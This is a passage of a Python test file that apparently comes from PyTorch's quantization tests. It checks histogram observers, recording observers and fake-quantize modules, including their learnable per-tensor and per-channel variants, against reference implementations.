Compute the quantization error if we use start_bin to end_bin as the
min and max to do the quantization.
"""
bin_width = (self.max_val.item() - self.min_val.item()) / self.bins
norm = 0.0
dst_bin_width = bin_width * (next_end_bin - next_start_bin + 1) / self.dst_nbins
if dst_bin_width == 0.0:
return 0.0
for src_bin in range(self.bins):
# distances from the beginning of first dst_bin to the beginning and
# end of src_bin
src_bin_begin = (src_bin - next_start_bin) * bin_width
src_bin_end = src_bin_begin + bin_width
# which dst_bins the beginning and end of src_bin belong to?
dst_bin_of_begin = min(
self.dst_nbins - 1, max(0.0, math.floor(src_bin_begin / dst_bin_width))
)
dst_bin_of_end = min(
self.dst_nbins - 1, max(0.0, math.floor(src_bin_end / dst_bin_width))
)
dst_bin_of_begin_center = (
dst_bin_of_begin * dst_bin_width + dst_bin_width / 2
)
density = self.histogram[src_bin] / bin_width
if dst_bin_of_begin == dst_bin_of_end:
# if src_bin is entirely within 1 dst_bin
delta_begin = src_bin_begin - dst_bin_of_begin_center
delta_end = src_bin_end - dst_bin_of_begin_center
norm = norm + _get_norm(delta_begin, delta_end, density, norm_type)
else:
delta_begin = src_bin_begin - dst_bin_of_begin_center
delta_end = dst_bin_width / 2
norm = norm + _get_norm(delta_begin, delta_end, density, norm_type)
norm = norm + (dst_bin_of_end - dst_bin_of_begin - 1) * _get_norm(
-dst_bin_width / 2, dst_bin_width / 2, density, norm_type
)
dst_bin_of_end_center = (
dst_bin_of_end * dst_bin_width + dst_bin_width / 2
)
delta_begin = -dst_bin_width / 2
delta_end = src_bin_end - dst_bin_of_end_center
norm = norm + _get_norm(delta_begin, delta_end, density, norm_type)
return norm
assert self.histogram.size()[0] == self.bins, "bins mistmatch"
bin_width = (self.max_val - self.min_val) / self.bins
# cumulative sum
total = sum(self.histogram)
cSum = torch.cumsum(self.histogram, dim=0)
stepsize = 1e-5 # granularity
alpha = 0.0 # lower bound
beta = 1.0 # upper bound
start_bin = 0
end_bin = self.bins - 1
norm_min = float("inf")
while alpha < beta:
# Find the next step
next_alpha = alpha + stepsize
next_beta = beta - stepsize
# find the left and right bins between the quantile bounds
l = start_bin
r = end_bin
while l < end_bin and cSum[l] < next_alpha * total:
l = l + 1
while r > start_bin and cSum[r] > next_beta * total:
r = r - 1
# decide the next move
next_start_bin = start_bin
next_end_bin = end_bin
if (l - start_bin) > (end_bin - r):
# move the start bin
next_start_bin = l
alpha = next_alpha
else:
# move the end bin
next_end_bin = r
beta = next_beta
if next_start_bin == start_bin and next_end_bin == end_bin:
continue
# calculate the quantization error using next_start_bin and next_end_bin
norm = _compute_quantization_error(next_start_bin, next_end_bin, "L2")
if norm > norm_min:
break
norm_min = norm
start_bin = next_start_bin
end_bin = next_end_bin
new_min = self.min_val + bin_width * start_bin
new_max = self.min_val + bin_width * (end_bin + 1)
return new_min, new_max
class TestRecordHistogramObserver(QuantizationTestCase):
# TODO: move this to quantize.py
def test_record_observer(self):
for qengine in supported_qengines:
with override_quantized_engine(qengine):
model = AnnotatedSingleLayerLinearModel()
model.qconfig = default_debug_qconfig
model = prepare(model)
# run the evaluation and dump all tensors
test_only_eval_fn(model, self.calib_data)
test_only_eval_fn(model, self.calib_data)
observer_dict = {}
get_observer_dict(model, observer_dict)
self.assertTrue('fc1.module.activation_post_process' in observer_dict.keys(),
'observer is not recorded in the dict')
self.assertEqual(len(observer_dict['fc1.module.activation_post_process'].get_tensor_value()),
2 * len(self.calib_data))
self.assertEqual(observer_dict['fc1.module.activation_post_process'].get_tensor_value()[0],
model(self.calib_data[0][0]))
@given(qdtype=st.sampled_from((torch.qint8, torch.quint8)),
qscheme=st.sampled_from((torch.per_tensor_affine, torch.per_tensor_symmetric)))
def test_observer_scriptable(self, qdtype, qscheme):
obs = RecordingObserver(dtype=qdtype, qscheme=qscheme)
scripted = torch.jit.script(obs)
x = torch.rand(3, 4)
obs(x)
scripted(x)
self.assertTrue(torch.equal(obs.get_tensor_value()[0], scripted.get_tensor_value()[0]))
buf = io.BytesIO()
torch.jit.save(scripted, buf)
buf.seek(0)
loaded = torch.jit.load(buf)
self.assertTrue(torch.equal(obs.get_tensor_value()[0], loaded.get_tensor_value()[0]))
@given(qdtype=st.sampled_from((torch.qint8, torch.quint8)),
qscheme=st.sampled_from((torch.per_tensor_affine, torch.per_tensor_symmetric)),
reduce_range=st.booleans())
@settings(max_examples=10)
def test_histogram_observer(self, qdtype, qscheme, reduce_range):
myobs = HistogramObserver(bins=3, dtype=qdtype, qscheme=qscheme, reduce_range=reduce_range)
# Calculate qparams should work for empty observers
qparams = myobs.calculate_qparams()
x = torch.tensor([2.0, 3.0, 4.0, 5.0], requires_grad=True)
y = torch.tensor([5.0, 6.0, 7.0, 8.0])
out_x = myobs(x)
self.assertTrue(out_x.requires_grad)
myobs(y)
self.assertEqual(myobs.min_val, 2.0)
self.assertEqual(myobs.max_val, 8.0)
self.assertEqual(myobs.histogram, [2., 3., 3.])
qparams = myobs.calculate_qparams()
if reduce_range:
if qscheme == torch.per_tensor_symmetric:
ref_scale = 0.0470588 * 255 / 127
ref_zero_point = 0 if qdtype is torch.qint8 else 128
else:
ref_scale = 0.0235294 * 255 / 127
ref_zero_point = -64 if qdtype is torch.qint8 else 0
else:
if qscheme == torch.per_tensor_symmetric:
ref_scale = 0.0470588
ref_zero_point = 0 if qdtype is torch.qint8 else 128
else:
ref_scale = 0.0235294
ref_zero_point = -128 if qdtype is torch.qint8 else 0
self.assertEqual(qparams[1].item(), ref_zero_point)
self.assertEqual(qparams[0].item(), ref_scale, atol=1e-5, rtol=0)
# Test for serializability
state_dict = myobs.state_dict()
b = io.BytesIO()
torch.save(state_dict, b)
b.seek(0)
loaded_dict = torch.load(b)
for key in state_dict:
self.assertEqual(state_dict[key], loaded_dict[key])
loaded_obs = HistogramObserver(bins=3, dtype=qdtype, qscheme=qscheme, reduce_range=reduce_range)
loaded_obs.load_state_dict(loaded_dict)
loaded_qparams = loaded_obs.calculate_qparams()
self.assertEqual(myobs.min_val, loaded_obs.min_val)
self.assertEqual(myobs.max_val, loaded_obs.max_val)
self.assertEqual(myobs.histogram, loaded_obs.histogram)
self.assertEqual(myobs.bins, loaded_obs.bins)
self.assertEqual(myobs.calculate_qparams(), loaded_obs.calculate_qparams())
def test_histogram_observer_one_sided(self):
myobs = HistogramObserver(bins=8, dtype=torch.quint8, qscheme=torch.per_tensor_affine, reduce_range=True)
x = torch.tensor([0.0, 0.3, 1.2, 1.7])
y = torch.tensor([0.1, 1.3, 2.0, 2.7])
myobs(x)
myobs(y)
self.assertEqual(myobs.min_val, 0)
qparams = myobs.calculate_qparams()
self.assertEqual(qparams[1].item(), 0)
def test_histogram_observer_same_inputs(self):
myobs = HistogramObserver(bins=3, dtype=torch.qint8, qscheme=torch.per_tensor_symmetric, reduce_range=False)
w = torch.ones(4, requires_grad=True)
x = torch.zeros(4, requires_grad=True)
y = torch.tensor([2.0, 3.0, 4.0, 5.0], requires_grad=True)
z = torch.tensor([5.0, 6.0, 7.0, 8.0])
myobs(w)
myobs(x)
myobs(x)
myobs(y)
myobs(z)
qparams = myobs.calculate_qparams()
self.assertEqual(myobs.min_val, 2.0)
self.assertEqual(myobs.max_val, 8.0)
self.assertEqual(myobs.histogram, [2., 3., 3.])
@given(N=st.sampled_from([10, 1000, 10**6]),
bins=st.sampled_from([256, 512, 1024, 2048]),
dtype=st.sampled_from([torch.qint8, torch.quint8]),
qscheme=st.sampled_from([torch.per_tensor_affine, torch.per_tensor_symmetric]),
reduce_range=st.booleans())
def test_histogram_observer_against_reference(self, N, bins, dtype, qscheme, reduce_range):
ref_obs = _ReferenceHistogramObserver(bins=bins, dtype=dtype, qscheme=qscheme, reduce_range=reduce_range)
my_obs = HistogramObserver(bins=bins, dtype=dtype, qscheme=qscheme, reduce_range=reduce_range)
for _ in range(10):
X = torch.randn(N)
my_obs(X)
ref_obs(X)
ref_qparams = ref_obs.calculate_qparams()
my_qparams = my_obs.calculate_qparams()
self.assertEqual(ref_qparams, my_qparams)
class TestFakeQuantizePerTensor(TestCase):
@given(device=st.sampled_from(['cpu', 'cuda'] if torch.cuda.is_available() else ['cpu']),
X=hu.tensor(shapes=hu.array_shapes(1, 5,),
qparams=hu.qparams(dtypes=torch.quint8)))
def test_forward_per_tensor(self, device, X):
r"""Tests the forward path of the FakeQuantizePerTensorAffine op.
"""
np.random.seed(NP_RANDOM_SEED)
X, (scale, zero_point, torch_type) = X
quant_min = torch.iinfo(torch_type).min
quant_max = torch.iinfo(torch_type).max
X = to_tensor(X, device)
Y = _fake_quantize_per_tensor_affine_reference(X.cpu(), scale, zero_point, quant_min, quant_max)
Y_prime = torch.fake_quantize_per_tensor_affine(
X, scale, zero_point, quant_min, quant_max)
np.testing.assert_allclose(Y, Y_prime.cpu(), rtol=tolerance, atol=tolerance)
@given(device=st.sampled_from(['cpu', 'cuda'] if torch.cuda.is_available() else ['cpu']),
X=hu.tensor(shapes=hu.array_shapes(1, 5,),
qparams=hu.qparams(dtypes=torch.quint8)))
@unittest.skip("temporarily disable the test")
def test_backward_per_tensor(self, device, X):
r"""Tests the backward method.
"""
np.random.seed(NP_RANDOM_SEED)
X, (scale, zero_point, torch_type) = X
quant_min = torch.iinfo(torch_type).min
quant_max = torch.iinfo(torch_type).max
X = to_tensor(X, device)
X.requires_grad_()
Y = _fake_quantize_per_tensor_affine_reference(X.cpu(), scale, zero_point, quant_min, quant_max)
Y_prime = torch.fake_quantize_per_tensor_affine(
X, scale, zero_point, quant_min, quant_max)
dout = torch.rand(X.shape, dtype=torch.float).to(device)
dX = _fake_quantize_per_tensor_affine_grad_reference(
dout, X, scale, zero_point, quant_min, quant_max)
Y_prime.backward(dout)
np.testing.assert_allclose(dX.cpu(), X.grad.cpu().detach().numpy(), rtol=tolerance, atol=tolerance)
@given(device=st.sampled_from(['cpu', 'cuda'] if torch.cuda.is_available() else ['cpu']),
X=hu.tensor(shapes=hu.array_shapes(1, 5,),
elements=hu.floats(-1e3, 1e3, allow_nan=False, allow_infinity=False),
qparams=hu.qparams(dtypes=torch.quint8)))
def test_learnable_py_module_forward_per_tensor(self, device, X):
r"""Tests the forward path of the _LearnableFakeQuantize module per tensor op.
"""
X, (scale, zero_point, torch_type) = X
scale = torch.tensor([scale]).to(device)
zero_point = torch.tensor([zero_point]).to(device)
quant_min = torch.iinfo(torch_type).min
quant_max = torch.iinfo(torch_type).max
X = to_tensor(X, device)
Y = _fake_quantize_per_tensor_affine_reference(
X, scale, zero_point, quant_min, quant_max).to(device)
Y_prime = _LearnableFakeQuantizePerTensorOp.apply(
X, scale, zero_point, quant_min, quant_max, 1.).to(device)
tolerance = 1e-2
self.assertTrue(
torch.allclose(Y, Y_prime, rtol=tolerance, atol=tolerance),
"Expected _LearnableFakeQuantizePerTensorOp to have results match the reference forward function")
@given(device=st.sampled_from(['cpu', 'cuda'] if torch.cuda.is_available() else ['cpu']),
X=hu.tensor(shapes=hu.array_shapes(1, 5,),
elements=hu.floats(-1e3, 1e3, allow_nan=False, allow_infinity=False),
qparams=hu.qparams(dtypes=torch.quint8)))
def test_learnable_py_module_backward_per_tensor(self, device, X):
X, (scale, zero_point, torch_type) = X
scale = torch.tensor([scale]).float().to(device)
zero_point = torch.tensor([zero_point]).float().to(device)
quant_min = torch.iinfo(torch_type).min
quant_max = torch.iinfo(torch_type).max
X = to_tensor(X, device)
X.requires_grad_()
scale.requires_grad_()
zero_point.requires_grad_()
Y_prime = _LearnableFakeQuantizePerTensorOp.apply(
X, scale, zero_point, quant_min, quant_max, 1.)
dout = torch.rand(X.shape, dtype=torch.float).to(device)
dX, dScale, dZeroPoint = _fake_quantize_learnable_per_tensor_affine_grad_reference(
dout, X, scale, zero_point, quant_min, quant_max, device)
Y_prime.backward(dout)
expected_dX = dX.to(device).detach()
actual_dX = X.grad.to(device).detach()
expected_dScale = dScale.to(device).detach()
actual_dScale = scale.grad.to(device).detach()
expected_dZeroPoint = dZeroPoint.to(device).detach()
actual_dZeroPoint = zero_point.grad.to(device).detach()
tolerance = 1e-2
self.assertTrue(
torch.allclose(
expected_dX, actual_dX, rtol=tolerance, atol=tolerance),
"Expected dX to match X.grad")
self.assertTrue(
torch.allclose(
expected_dScale, actual_dScale, rtol=tolerance, atol=tolerance),
"Expected dScale to match scale.grad")
self.assertTrue(
torch.allclose(
expected_dZeroPoint, actual_dZeroPoint, rtol=tolerance, atol=tolerance),
"Expected dZeroPoint to match zero_point.grad")
def _test_learnable_forward_per_tensor(self, X, device, scale_base, zero_point_base):
X_base = torch.tensor(X).to(device)
for n_bits in (4, 8):
quant_min, quant_max = 0, 2 ** n_bits - 1
X = X_base.clone().float()
scale_base = scale_base.to(device).float()
zero_point_base = zero_point_base.to(dtype=torch.int64, device=device)
scale = scale_base.clone()
zero_point = zero_point_base.clamp(quant_min, quant_max)
Y = _fake_quantize_per_tensor_affine_reference(
X, scale, zero_point, quant_min, quant_max).to(device)
Y_prime = torch._fake_quantize_learnable_per_tensor_affine(
X, scale, zero_point, quant_min, quant_max).to(device)
self.assertTrue(
torch.allclose(Y, Y_prime, rtol=tolerance, atol=tolerance),
"Expected kernel forward function to have results match the reference forward function")
@given(X=hu.tensor(shapes=hu.array_shapes(1, 5,),
elements=hu.floats(-1e3, 1e3, allow_nan=False, allow_infinity=False),
qparams=hu.qparams(dtypes=torch.quint8)))
def test_learnable_forward_per_tensor_cpu(self, X):
X, (_, _, _) = X
scale_base = torch.normal(mean=0, std=1, size=(1,)).clamp(1e-4, 100)
zero_point_base = torch.normal(mean=0, std=128, size=(1,))
self._test_learnable_forward_per_tensor(
X, 'cpu', scale_base, zero_point_base)
@given(X=hu.tensor(shapes=hu.array_shapes(1, 5,),
elements=hu.floats(-1e3, 1e3, allow_nan=False, allow_infinity=False),
qparams=hu.qparams(dtypes=torch.quint8)))
@unittest.skipIf(not TEST_CUDA, "No gpu is not available.")
def test_learnable_forward_per_tensor_cuda(self, X):
X, (_, _, _) = X
scale_base = torch.normal(mean=0, std=1, size=(1,)).clamp(1e-4, 100)
zero_point_base = torch.normal(mean=0, std=128, size=(1,))
self._test_learnable_forward_per_tensor(
X, 'cuda', scale_base, zero_point_base)
def _test_learnable_backward_per_tensor(self, X, device, scale_base, zero_point_base):
r"""Tests the backward method with additional backprop support for scale and zero point.
"""
X_base = torch.tensor(X).to(device)
for n_bits in (4, 8):
quant_min, quant_max = 0, 2 ** n_bits - 1
X = X_base.clone().float().to(device)
X.requires_grad_()
scale_base = scale_base.to(device)
zero_point_base = zero_point_base.to(device)
scale = scale_base.clone()
scale.requires_grad_()
zero_point = zero_point_base.clone().clamp(quant_min, quant_max)
zero_point.requires_grad_()
Y_prime = torch._fake_quantize_learnable_per_tensor_affine(
X, scale, zero_point, quant_min, quant_max).to(device)
dout = torch.rand(X.shape, dtype=torch.float).to(device)
dX, dScale, dZeroPoint = _fake_quantize_learnable_per_tensor_affine_grad_reference(
dout, X, scale, zero_point, quant_min, quant_max, device)
Y_prime.backward(dout)
expected_dX = dX.to(device).detach()
actual_dX = X.grad.to(device).detach()
expected_dScale = dScale.to(device).detach()
actual_dScale = scale.grad.to(device).detach()
expected_dZeroPoint = dZeroPoint.to(device).detach()
actual_dZeroPoint = zero_point.grad.to(device).detach()
self.assertTrue(
torch.allclose(
expected_dX, actual_dX, rtol=tolerance, atol=tolerance),
"Expected dX to match X.grad")
self.assertTrue(
torch.allclose(
expected_dScale, actual_dScale, rtol=tolerance, atol=tolerance),
"Expected dScale to match scale.grad")
self.assertTrue(
torch.allclose(
expected_dZeroPoint, actual_dZeroPoint, rtol=tolerance, atol=tolerance),
"Expected dZeroPoint to match zero_point.grad")
@given(X=hu.tensor(shapes=hu.array_shapes(1, 5,),
elements=hu.floats(-1e3, 1e3, allow_nan=False, allow_infinity=False),
qparams=hu.qparams(dtypes=torch.quint8)))
def test_learnable_backward_per_tensor_cpu(self, X):
torch.random.manual_seed(NP_RANDOM_SEED)
X, (_, _, _) = X
scale_base = torch.normal(mean=0, std=1, size=(1,)).clamp(1e-4, 100)
zero_point_base = torch.normal(mean=0, std=128, size=(1,))
self._test_learnable_backward_per_tensor(
X, 'cpu', scale_base, zero_point_base)
@given(X=hu.tensor(shapes=hu.array_shapes(1, 5,),
elements=hu.floats(-1e3, 1e3, allow_nan=False, allow_infinity=False),
qparams=hu.qparams(dtypes=torch.quint8)))
@unittest.skipIf(not TEST_CUDA, "No gpu is not available.")
def test_learnable_backward_per_tensor_cuda(self, X):
torch.random.manual_seed(NP_RANDOM_SEED)
X, (_, _, _) = X
scale_base = torch.normal(mean=0, std=1, size=(1,)).clamp(1e-4, 100)
zero_point_base = torch.normal(mean=0, std=128, size=(1,))
self._test_learnable_backward_per_tensor(
X, 'cuda', scale_base, zero_point_base)
@given(device=st.sampled_from(['cpu', 'cuda'] if torch.cuda.is_available() else ['cpu']),
X=hu.tensor(shapes=hu.array_shapes(1, 5,),
qparams=hu.qparams(dtypes=torch.quint8)))
# https://github.com/pytorch/pytorch/issues/30604
@unittest.skip("temporarily disable the test")
def test_numerical_consistency_per_tensor(self, device, X):
r"""Comparing numerical consistency between CPU quantize/dequantize op and the CPU fake quantize op
"""
np.random.seed(NP_RANDOM_SEED)
X, (scale, zero_point, torch_type) = X
quant_min = torch.iinfo(torch_type).min
quant_max = torch.iinfo(torch_type).max
X = to_tensor(X, device)
# quantize_per_tensor and dequantize are only implemented in CPU
Y = torch.dequantize(torch.quantize_per_tensor(X.cpu(), scale, zero_point, torch_type))
Y_prime = torch.fake_quantize_per_tensor_affine(
X, scale, zero_point, quant_min, quant_max)
np.testing.assert_allclose(Y, Y_prime.cpu(), rtol=tolerance, atol=tolerance)
@given(device=st.sampled_from(['cpu', 'cuda'] if torch.cuda.is_available() else ['cpu']),
X=hu.tensor(shapes=hu.array_shapes(1, 5,),
qparams=hu.qparams(dtypes=[torch.quint8])),
)
def test_fq_module(self, device, X):
np.random.seed(NP_RANDOM_SEED)
X, (scale, zero_point, torch_type) = X
quant_min = torch.iinfo(torch_type).min
quant_max = torch.iinfo(torch_type).max
X = to_tensor(X, device)
X.requires_grad_()
fq_module = torch.quantization.default_fake_quant().to(device)
Y_prime = fq_module(X)
assert fq_module.scale is not None
assert fq_module.zero_point is not None
Y = _fake_quantize_per_tensor_affine_reference(X, fq_module.scale, fq_module.zero_point, quant_min, quant_max)
np.testing.assert_allclose(Y.cpu().detach().numpy(), Y_prime.cpu().detach().numpy(), rtol=tolerance, atol=tolerance)
# Test backward
dout = torch.rand(X.shape, dtype=torch.float, device=device)
Y_prime.backward(dout)
dX = _fake_quantize_per_tensor_affine_grad_reference(dout, X, fq_module.scale, fq_module.zero_point, quant_min, quant_max)
np.testing.assert_allclose(dX.cpu().numpy(), X.grad.cpu().detach().numpy(), rtol=tolerance, atol=tolerance)
def test_fq_serializable(self):
observer = default_observer
quant_min = 0
quant_max = 255
fq_module = FakeQuantize(observer, quant_min, quant_max)
X = torch.tensor([-5, -3.5, -2, 0, 3, 5, 7], dtype=torch.float32)
y_ref = fq_module(X)
state_dict = fq_module.state_dict()
self.assertEqual(state_dict['scale'], 0.094488)
self.assertEqual(state_dict['zero_point'], 53)
b = io.BytesIO()
torch.save(state_dict, b)
b.seek(0)
loaded_dict = torch.load(b)
loaded_fq_module = FakeQuantize(observer, quant_min, quant_max)
loaded_fq_module.load_state_dict(loaded_dict)
for key in state_dict:
self.assertEqual(state_dict[key], loaded_fq_module.state_dict()[key])
self.assertEqual(loaded_fq_module.calculate_qparams(), fq_module.calculate_qparams())
def test_fake_quant_control(self):
torch.manual_seed(42)
X = torch.rand(20, 10, dtype=torch.float32)
fq_module = torch.quantization.default_fake_quant()
# Output of fake quant is not identical to input
Y = fq_module(X)
self.assertNotEqual(Y, X)
torch.quantization.disable_fake_quant(fq_module)
X = torch.rand(20, 10, dtype=torch.float32)
Y = fq_module(X)
# Fake quant is disabled,output is identical to input
self.assertEqual(Y, X)
# Explicit copy at this point in time, because FakeQuant keeps internal
# state in mutable buffers.
scale = fq_module.scale.clone().detach()
zero_point = fq_module.zero_point.clone().detach()
torch.quantization.disable_observer(fq_module)
torch.quantization.enable_fake_quant(fq_module)
X = 10.0 * torch.rand(20, 10, dtype=torch.float32) - 5.0
Y = fq_module(X)
self.assertNotEqual(Y, X)
# Observer is disabled, scale and zero-point do not change
self.assertEqual(fq_module.scale, scale)
self.assertEqual(fq_module.zero_point, zero_point)
torch.quantization.enable_observer(fq_module)
Y = fq_module(X)
self.assertNotEqual(Y, X)
# Observer is enabled, scale and zero-point are different
self.assertNotEqual(fq_module.scale, scale)
self.assertNotEqual(fq_module.zero_point, zero_point)
def test_fake_quant_preserves_qparam_shapes_for_activations(self):
class Model(nn.Module):
def __init__(self):
super(Model, self).__init__()
self.linear = nn.Linear(4, 4)
def forward(self, x):
x = self.linear(x)
return x
m = Model()
m.qconfig = torch.quantization.get_default_qat_qconfig('fbgemm')
torch.quantization.prepare_qat(m, inplace=True)
scale_shape_before = m.linear.activation_post_process.scale.shape
zero_point_shape_before = m.linear.activation_post_process.zero_point.shape
x = torch.rand(4, 4, 4, 4)
m(x)
scale_shape_after = m.linear.activation_post_process.scale.shape
zero_point_shape_after = m.linear.activation_post_process.zero_point.shape
self.assertEqual(
scale_shape_before, scale_shape_after,
msg="FakeQuant scale shape must stay consistent")
self.assertEqual(
zero_point_shape_before, zero_point_shape_after,
msg="FakeQuant zero_point shape must stay consistent")
def fake_quant_scriptable(self):
observer = default_observer
quant_min = 0
quant_max = 255
fq_module = FakeQuantize(observer, quant_min, quant_max)
scripted_module = torch.jit.script(fq_module)
X = torch.tensor([-5, -3.5, -2, 0, 3, 5, 7], dtype=torch.float32)
fq_module(X)
scripted_module(X)
self.assertEqual(fq_module.calculate_qparams(),
scripted_module.calculate_qparams())
buf = io.BytesIO()
torch.jit.save(scripted_module, buf)
buf.seek(0)
loaded_module = torch.jit.load(buf)
self.assertEqual(fq_module.calculate_qparams(),
loaded_module.calculate_qparams())
class TestFakeQuantizePerChannel(TestCase):
@given(device=st.sampled_from(['cpu', 'cuda'] if torch.cuda.is_available() else ['cpu']),
X=hu.per_channel_tensor(shapes=hu.array_shapes(1, 5,),
qparams=hu.qparams(dtypes=torch.quint8)))
def test_forward_per_channel(self, device, X):
r"""Tests the forward path of the FakeQuantizePerTensorAffine op.
"""
np.random.seed(NP_RANDOM_SEED)
X, (scale, zero_point, axis, torch_type) = X
quant_min = torch.iinfo(torch_type).min
quant_max = torch.iinfo(torch_type).max
X = to_tensor(X, device)
scale = to_tensor(scale, device)
zero_point = torch.tensor(zero_point).to(dtype=torch.int64, device=device)
Y = _fake_quantize_per_channel_affine_reference(X.cpu(), scale.cpu(), zero_point.cpu(), axis, quant_min, quant_max)
Y_prime = torch.fake_quantize_per_channel_affine(
X, scale, zero_point, axis, quant_min, quant_max)
np.testing.assert_allclose(Y, Y_prime.cpu(), rtol=tolerance, atol=tolerance)
def _test_learnable_forward_per_channel(self, X_base, device, scale_base, zero_point_base, axis):
r"""Tests the forward path of the learnable FakeQuantizePerTensorAffine op.
"""
for n_bits in (4, 8):
quant_min, quant_max = 0, 2 ** (n_bits) - 1
scale_base = scale_base.to(device)
zero_point_base = zero_point_base.clamp(quant_min, quant_max)
X_curr = X_base.clone()
scale_curr = scale_base.clone()
zero_point_curr = zero_point_base.to(dtype=torch.int64, device=device)
Y = _fake_quantize_per_channel_affine_reference(
X_curr, scale_curr, zero_point_curr, axis, quant_min, quant_max).to(device)
Y_prime = torch._fake_quantize_learnable_per_channel_affine(
X_curr, scale_curr, zero_point_curr, axis, quant_min, quant_max).to(device)
self.assertTrue(
torch.allclose(Y, Y_prime, rtol=tolerance, atol=tolerance),
"Expected kernel forward function to have results match the reference forward function")
@given(X=hu.per_channel_tensor(shapes=hu.array_shapes(1, 5,),
qparams=hu.qparams(dtypes=torch.quint8)))
def test_learnable_forward_per_channel_cpu(self, X):
torch.random.manual_seed(NP_RANDOM_SEED)
X, (_, _, axis, _) = X
X_base = torch.tensor(X).to('cpu')
channel_size = X_base.size(axis)
scale_base = torch.normal(mean=0, std=1, size=(channel_size,)).clamp(1e-4, 100)
zero_point_base = torch.normal(mean=0, std=128, size=(channel_size,))
self._test_learnable_forward_per_channel(
X_base, 'cpu', scale_base, zero_point_base, axis)
@given(X=hu.per_channel_tensor(shapes=hu.array_shapes(1, 5,),
qparams=hu.qparams(dtypes=torch.quint8)))
@unittest.skipIf(not TEST_CUDA, "No gpu is not available.")
def test_learnable_forward_per_channel_cuda(self, X):
torch.random.manual_seed(NP_RANDOM_SEED)
X, (_, _, axis, _) = X
X_base = torch.tensor(X).to('cuda')
channel_size = X_base.size(axis)
scale_base = torch.normal(mean=0, std=1, size=(channel_size,)).clamp(1e-4, 100)
zero_point_base = torch.normal(mean=0, std=128, size=(channel_size,))
self._test_learnable_forward_per_channel(
X_base, 'cuda', scale_base, zero_point_base, axis)
@given(device=st.sampled_from(['cpu', 'cuda'] if torch.cuda.is_available() else ['cpu']),
X=hu.per_channel_tensor(shapes=hu.array_shapes(1, 5,),
qparams=hu.qparams(dtypes=torch.quint8)))
def test_backward_per_channel(self, device, X):
r"""Tests the backward method.
"""
np.random.seed(NP_RANDOM_SEED)
X, (scale, zero_point, axis, torch_type) = X
quant_min = torch.iinfo(torch_type).min
quant_max = torch.iinfo(torch_type).max
X = to_tensor(X, device)
scale = to_tensor(scale, device)
zero_point = torch.tensor(zero_point).to(dtype=torch.int64, device=device)
X.requires_grad_()
Y_prime = torch.fake_quantize_per_channel_affine(
X, scale, zero_point, axis, quant_min, quant_max)
dout = torch.rand(X.shape, dtype=torch.float).to(device)
dX = _fake_quantize_per_channel_affine_grad_reference(
dout, X, scale, zero_point, axis, quant_min, quant_max)
Y_prime.backward(dout)
np.testing.assert_allclose(dX.cpu().detach().numpy(), X.grad.cpu().detach().numpy(), rtol=tolerance, atol=tolerance)
def _test_learnable_backward_per_channel(self, X_base, device, scale_base, zero_point_base, axis):
r"""Tests the backward path of the learnable FakeQuantizePerTensorAffine op.
"""
for n_bits in (4, 8):
quant_min, quant_max = 0, 2 ** n_bits - 1
scale_base = scale_base.to(device)
zero_point_base = zero_point_base.to(device=device)
X_curr = X_base.clone()
X_curr.requires_grad_()
scale_curr = scale_base.clone()
scale_curr.requires_grad_()
zero_point_curr = zero_point_base.clamp(quant_min, quant_max)
zero_point_curr.requires_grad_()
Y_prime = torch._fake_quantize_learnable_per_channel_affine(
X_curr, scale_curr, zero_point_curr, axis, quant_min, quant_max).to(device)
dout = torch.rand(X_curr.shape, dtype=torch.float).to(device)
dX, dScale, dZeroPoint = _fake_quantize_learnable_per_channel_affine_grad_reference(
dout, X_curr, scale_curr, zero_point_curr, axis, quant_min, quant_max, device)
Y_prime.backward(dout)
dX_expected = dX.to(device).detach()
dX_actual = X_curr.to(device).grad.detach()
dScale_expected = dScale.to(device).detach()
dScale_actual = scale_curr.to(device).grad.detach()
dZeroPoint_expected = dZeroPoint.to(device).detach()
dZeroPoint_actual = zero_point_curr.to(device).grad.detach()
tolerance = 1e-4
self.assertTrue(
torch.allclose(dX_expected, dX_actual, rtol=tolerance, atol=tolerance),
"Expected dX to match X.grad")
self.assertTrue(
torch.allclose(dScale_expected, dScale_actual, rtol=tolerance, atol=tolerance),
"Expected dScale to match scale.grad")
self.assertTrue(
torch.allclose(dZeroPoint_expected, dZeroPoint_actual, rtol=tolerance, atol=tolerance),
"Expected dZeroPoint to match zero_point.grad")
@given(X=hu.per_channel_tensor(shapes=hu.array_shapes(2, 5,),
qparams=hu.qparams(dtypes=torch.quint8)))
def test_learnable_backward_per_channel_cpu(self, X):
torch.random.manual_seed(NP_RANDOM_SEED)
X, (_, _, axis, _) = X
X_base = torch.tensor(X).to('cpu')
channel_size = X_base.size(axis)
scale_base = torch.normal(mean=0, std=1, size=(channel_size,)).clamp(1e-4, 100)
zero_point_base = torch.normal(mean=0, std=128, size=(channel_size,))
self._test_learnable_backward_per_channel(
X_base, 'cpu', scale_base, zero_point_base, axis)
@given(X=hu.per_channel_tensor(shapes=hu.array_shapes(2, 5,),
qparams=hu.qparams(dtypes=torch.quint8)))
@unittest.skip("temporarily disable the test")
def test_learnable_backward_per_channel_cuda(self, X):
torch.random.manual_seed(NP_RANDOM_SEED)
X, (scale, zero_point, axis, torch_type) = X
X_base = torch.tensor(X).to('cuda')
scale_base = to_tensor(scale, 'cuda')
zero_point_base = to_tensor(zero_point, 'cuda')
self._test_learnable_backward_per_channel(
X_base, 'cuda', scale_base, zero_point_base, axis)
@given(device=st.sampled_from(['cpu', 'cuda'] if torch.cuda.is_available() else ['cpu']),
X=hu.per_channel_tensor(shapes=hu.array_shapes(2, 5,),
elements=hu.floats(-1e3, 1e3, allow_nan=False, allow_infinity=False),
qparams=hu.qparams(dtypes=torch.quint8)))
def test_learnable_py_module_forward_per_channel(self, device, X):
r"""Tests the forward path of the _LearnableFakeQuantizePerChannel op.
"""
X, (scale, zero_point, axis, torch_type) = X
quant_min = torch.iinfo(torch_type).min
quant_max = torch.iinfo(torch_type).max
X = to_tensor(X, device)
scale = to_tensor(scale, device)
zero_point = torch.tensor(zero_point).to(dtype=torch.int64, device=device)
Y = _fake_quantize_per_channel_affine_reference(
X, scale, zero_point, axis, quant_min, quant_max).to(device)
Y_prime = _LearnableFakeQuantizePerChannelOp.apply(
X, scale, zero_point, axis, quant_min, quant_max, 1.).to(device)
tolerance = 1e-2
self.assertTrue(
torch.allclose(Y, Y_prime, rtol=tolerance, atol=tolerance),
"Expected _LearnableFakeQuantizePerChannelOp to have results match the reference forward function")
@given(device=st.sampled_from(['cpu', 'cuda'] if torch.cuda.is_available() else ['cpu']),
